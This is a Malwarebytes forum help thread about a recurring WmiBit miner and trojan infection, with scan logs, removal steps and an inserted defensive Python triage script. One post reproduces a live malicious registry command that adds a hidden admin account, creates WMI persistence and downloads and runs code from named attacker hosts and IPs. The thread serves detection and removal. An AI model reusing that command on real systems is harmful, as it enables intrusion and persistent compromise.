Anmolrazdan #1 Posted January 9

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 1/9/19
Scan Time: 7:14 PM
Log File: ba76cfbf-1414-11e9-874f-089e01f95592.json

-Software Information-
Version: 3.6.1.2711
Components Version: 1.0.463
Update Package Version: 1.0.6913
License: Free

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Hp-PC\Hp

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 240782
Threats Detected: 29
Threats Quarantined: 29
Time Elapsed: 3 min, 12 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 15
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{B40E32BA-1A3F-409C-B460-69D67C9264CE}, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}, Quarantined, [6047], [430784],1.0.6913

Registry Value: 6
Trojan.Agent.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|START, Quarantined, [3703], [400553],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9334C4AC-C277-45B3-BFC3-6BB70FC71589}|PATH, Quarantined, [6047], [430786],1.0.6913
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{B40E32BA-1A3F-409C-B460-69D67C9264CE}|PATH, Quarantined, [3703], [417161],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C10082AF-D23A-46AD-99EA-1F37CDBA3526}|PATH, Quarantined, [6047], [430786],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{F5D7FF3D-F5D0-4461-AE7A-2F26E56CF55B}|PATH, Quarantined, [6047], [430791],1.0.6913
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FA7301F1-DD2D-462A-A6D6-CE6F13C56428}|PATH, Quarantined, [6047], [430786],1.0.6913

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 8
Trojan.Agent.BTMGen, C:\WINDOWS\TEMP\CONHOST.EXE, Quarantined, [6149], [217077],1.0.6913
Trojan.BitCoinMiner.WmiBit, C:\WINDOWS\DEBUG\LSMOSE.EXE, Quarantined, [6285], [430813],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA, Quarantined, [6047], [430789],1.0.6913
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, Quarantined, [3703], [417164],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa1, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa2, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\Mysa3, Quarantined, [6047], [430784],1.0.6913
Trojan.Agent.E, C:\PROGRAM FILES\COMMON FILES\XPDOWN.DAT, Quarantined, [3710], [568219],1.0.6913

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)

(end)
LDTate #2 Posted January 9

Hello, and please take your time.

Windows 7
Restart your computer in Safe Mode.
Using the F8 or F5 Method:
Restart your computer.
When the computer starts you will see your computer's hardware being listed. When you see this information, start to gently tap the F8 key on your keyboard repeatedly until you are presented with the Windows 7 Advanced Boot Options.
Select Safe Mode With Networking, then press the enter key on your keyboard to boot into Windows 7 Safe Mode.
When Windows starts you will be at a typical logon screen. Logon to your computer and Windows 7 will enter Safe mode.

Open Malwarebytes (MBAM), make sure Scan For Rootkits is checked, run a new scan and Quarantine all.
**Power Off** (shutdown) the pc. Wait a few minutes.
Restart in Normal Mode, run a new scan and make sure it's gone.
Anmolrazdan #3 Posted January 9

Found some new virus during full scan, please help me.
Anmolrazdan #4 Posted January 9

I did this but the virus appeared again.
Anmolrazdan #5 Posted January 9

I quarantined and then deleted them.
LDTate #6 Posted January 9

Did that take care of it? If not, do this.

NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system.

Download Malwarebytes Support Tool https://downloads.malwarebytes.com/file/mbst?src=Forums-Reply
Once the file is downloaded, open your Downloads folder/location of the downloaded file
Double-click mb-support-X.X.X.XXXX.exe to run the program
You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
Place a checkmark next to Accept License Agreement and click Next
You will be presented with a page stating, "Get Started!"
Click the Advanced tab
Click the Gather Logs button
A progress bar will appear and the program will proceed with getting logs from your computer
Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK
Please attach the file in your next reply.
Anmolrazdan #7 Posted January 9

I will do this and will soon message you.
Anmolrazdan #8 Posted January 9

mbst-grab-results.zip
LDTate #9 Posted January 9

There's no need to message me as I get notified when you add a reply here.

I have attached a file I need you to download and save it to the same place that you saved the FRST program. This fix will include removing temp files and emptying the Recycle Bin.

Download attached **fixlist.txt** and save it to the same location where the FRST tool is located.
NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.
Close all browsers before running.
Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
•Click the **Fix Button**.
•If you receive a message that a reboot is required, please make sure you allow it to restart normally.
•The tool will complete its run after restart.
When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run.
Please attach the Fixlog.txt in your reply.

Restart the pc and let me know how it's running now.

fixlist.txt
Anmolrazdan #10 Posted January 9

Can you give me an idea where it will be present, as I am having trouble finding it?
Anmolrazdan #13 Posted January 9

New virus found after restart through threat scan.

virus new.txt
LDTate #14 Posted January 9

I need you to download and run this tool and ONLY select Repair WMI
https://www.bleepingcomputer.com/download/windows-repair-all-in-one/
Anmolrazdan #15 Posted January 9

I did it and restarted the computer, but after the restart Malwarebytes was continuously prompting me about a trojan; the prompt says the site was blocked due to a trojan.
LDTate #16 Posted January 9

I need to see what is being blocked.

Open Malwarebytes > History > Application Logs
Double Click the **Protection log** to open it
On the lower left select **Export** > Export to Text
Save as mbamscan and Save it to your desktop
Attach the mbamscan text file in your next reply.
Anmolrazdan #17 Posted January 10

Some of the sites which are being blocked:

trojan.txt
trojan 2.txt
trojan 3.txt
trojan 4.txt
trojan 5.txt
trojan 6.txt
trojan 7.txt
Anmolrazdan #18 Posted January 10

Got a new virus again.

virus.txt
LDTate #19 Posted January 10

I need new logs.

Double-click mb-support-X.X.X.XXXX.exe to run the program
You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent.
Place a checkmark next to Accept License Agreement and click Next
You will be presented with a page stating, "Get Started!"
Click the Advanced tab
Click the Gather Logs button
A progress bar will appear and the program will proceed with getting logs from your computer
Upon completion, a file named mbst-grab-results.zip will be saved to your Desktop. Click OK
Please attach the file in your next reply.
Anmolrazdan #20 Posted January 11

The results, and some files named System Volume Information and Recycle Bin folders are formed in local disk, volume E, D, F.

mbst-grab-results.zip
LDTate #21 Posted January 11

I have attached a file I need you to download and save it to the same place that you saved the FRST program. This fix will include removing temp files and emptying the Recycle Bin.

Download attached **fixlist.txt** and save it to the same location where the FRST tool is located.
NOTE: Both FRST.exe and the fixlist.txt must be in the same location or the fix will not work.
Close all browsers before running.
Double click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
•Click the **Fix Button**.
•If you receive a message that a reboot is required, please make sure you allow it to restart normally.
•The tool will complete its run after restart.
When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run.
Please attach the Fixlog.txt in your reply.

Restart the pc and let me know how it's running now.

fixlist.txt
RootyRoot #22 Posted January 12

I've been having fun for days wrestling with this, myself. I still don't think I've got it all.

First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG. In the StartUp tab, it keeps adding this:

regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll

The URL doesn't actually work, but I don't think that's the point.

My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector viruses, etc.). My further theory is that they all work together to keep each other activated, and/or reinstall, if one of them gets removed.

It disabled "Hibernate", and even the ability to turn it on. More importantly, it completely disabled my MalwareBytes from even running. I'd click it, and it would not even appear in TaskManager. Reinstalled it to a different directory, uninstalled all of them - nothing worked. Even MBAM Chameleon would not work. That's some impressive work.

I tried a number of other anti-virus/anti-malware software, and the best I could get were "there are no more endpoints available from the endpoint mapper" errors. (Apparently, this has something to do with RPC, according to some scant research I've done.) Powershell is also involved, even though I don't think I have powershell on this infected XP laptop. Perhaps there's something like it? I found this in my research: https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/

But I digress. Part of the merry-go-round were the following files that kept re-appearing:

C:\WINDOWS\system32\max.exe
C:\WINDOWS\system32\new.exe
C:\WINDOWS\TEMP\conhost.exe

and there was something in the C:\WINDOWS\inf directory. Merely deleting them didn't work. Out of a kind of desperation, I made zero-byte files of the same file names, assuming (correctly, as it turns out) that the virus could/would not overwrite them. This was not the final solution, but at least seemed to stop part of the merry-go-round of re-installation of other viral components. At least I could, in Safe Mode, get some other anti-virus software to start to chip away at the other pieces.

WMI (Windows Management Instrumentation) was another piece of this. I found this command somewhere in the registry. (Sorry I did not document where.) (Apologies for the language, but it's not mine.)

cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="*****youmm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='*****youmm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="*****youmm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="*****youmm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="*****youmm3"", Consumer="CommandLineEventConsumer.Name="*****youmm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll

Some of those URLs don't work, but many of the IP-based ones do. (Shame on the hosting company that allows them to continue to work!)

This reminds me, part of the viruses create a new user named "admin$". Make sure not to log in using that. If it's the only option, reboot in SafeMode.

It is my strong belief that these viruses loaded onto my computer via a website advertisement. Time for me to invest in ad-blocking software.

I don't have a complete solution for you, since I'm not sure I've completely repaired my laptop, thus far - but at least I'm making progress. Ideally, some of what I've found so far can help someone more expert than myself try to tackle this.
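A defender's triage pass over the kind of entries RootyRoot lists above (the MSCONFIG startup command and the WMI CommandLineEventConsumer template), written as an added example for this thread; it is not code from the thread, from Malwarebytes or from any tool recommended here. It flags the behaviours that post describes: regsvr32 loading a scriptlet over HTTP with scrobj.dll, an encoded PowerShell command, a DownloadString cradle, wmic creating objects in root\subscription, and a local account being added to Administrators. The sample entries are constructed (reserved .invalid hostname, TEST-NET address, placeholder password), and the -enc decoder relies on the fact that PowerShell reads that argument as base64 of UTF-16LE text.

```python
"""Triage persistence entries for the indicators seen in this thread (added example)."""
import base64
import re

# Each rule: (name, pattern, why it matters). The patterns describe the
# behaviours quoted in the thread, not the specific hosts or filenames.
RULES = [
    ("regsvr32-remote-scriptlet",
     re.compile(r"regsvr32\b.*?/i:https?://.*?\bscrobj\.dll", re.I),
     "regsvr32 fetching a scriptlet over HTTP: runs code without a file on disk"),
    ("powershell-encoded",
     re.compile(r"powershell(?:\.exe)?\b.*?\s-(?:enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
     "PowerShell launched with a base64 -enc payload"),
    ("powershell-download-cradle",
     re.compile(r"IEX\s*\(.*?DownloadString\(", re.I),
     "in-memory download-and-execute cradle"),
    ("wmi-subscription-create",
     re.compile(r"wmic\b.*?root\\subscription.*?\b(?:__EventFilter|CommandLineEventConsumer|"
                r"ActiveScriptEventConsumer|__FilterToConsumerBinding)\b.*?\bCREATE\b", re.I),
     "permanent WMI event subscription being (re)created"),
    ("local-admin-account-added",
     re.compile(r"\bnet1?\s+(?:user\s+\S+\s+\S+\s+/ad|localgroup\s+administr\w+\s+\S+\s+/ad)\b", re.I),
     "new local account created or added to Administrators"),
]

URL_RE = re.compile(r'https?://[^\s\'"&|)]+')


def decode_encoded_command(cmdline):
    """Return the text behind a PowerShell -enc argument, or None if absent/undecodable.
    -enc carries base64 of UTF-16LE text, so that is exactly what is decoded here."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(entries):
    """entries: iterable of (source, command_line). Returns one finding per entry
    that matches at least one rule, with the indicators hit, any decoded -enc
    payload and the remote URLs the command references (for blocking/lookup)."""
    findings = []
    for source, cmdline in entries:
        hits = [name for name, rx, _ in RULES if rx.search(cmdline)]
        if not hits:
            continue
        findings.append({
            "source": source,
            "indicators": hits,
            "decoded_powershell": decode_encoded_command(cmdline),
            "remote_urls": sorted(set(URL_RE.findall(cmdline))),
        })
    return findings


# Constructed sample payload: a harmless command, encoded the way -enc expects it.
SAMPLE_ENC = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode("ascii")

# Constructed sample entries shaped like the thread's findings. Hosts are the
# reserved .invalid TLD and a TEST-NET-1 address; the password is a placeholder.
SAMPLE_ENTRIES = [
    ("msconfig:Startup",
     "regsvr32 /u /s /i:http://js.example.invalid:280/v.sct scrobj.dll"),
    ("wmi:CommandLineEventConsumer",
     "cmd /c net1 user admin$ PLACEHOLDER /ad&net1 localgroup administrators admin$ /ad"
     r'&wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="filter1", '
     r'QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800"'
     f"&cmd /c powershell.exe -nop -enc {SAMPLE_ENC}"
     "&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.0.2.10/s.txt')"),
    ("hklm:Run\\Updater",            # benign-looking entry: should produce no finding
     r'"C:\Program Files\Vendor\updater.exe" /background'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f["source"])
        for name in f["indicators"]:
            print("  -", name, ":", next(why for n, _, why in RULES if n == name))
        if f["decoded_powershell"]:
            print("  decoded -enc:", f["decoded_powershell"])
        for url in f["remote_urls"]:
            print("  url:", url)
```

On a live box the entries come from the Startup tab / HKLM Run keys and from the root\subscription namespace: on Windows 7, `Get-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer` in PowerShell; on the XP laptop RootyRoot describes, `wmic /NAMESPACE:\\root\subscription PATH CommandLineEventConsumer GET Name,CommandLineTemplate`. Decoding the -enc argument before anything else is the fastest way to tell what a consumer will run the next time its filter fires, which is why the thread's "it keeps coming back" symptom points at WMI rather than at the files being deleted.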
RootyRoot #23 Posted January 12

By the way, "SFX:Agent-E" is involved in this all, somehow. There was some script somewhere I could not document the location of.
LDTate #24 Posted January 13

Did you run the fix I gave you? For the WMI.

I need you to download and run this tool and ONLY select Repair WMI
https://www.bleepingcomputer.com/download/windows-repair-all-in-one/
AdvancedSetup #25 Posted February 27

Due to the lack of feedback, this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Thanks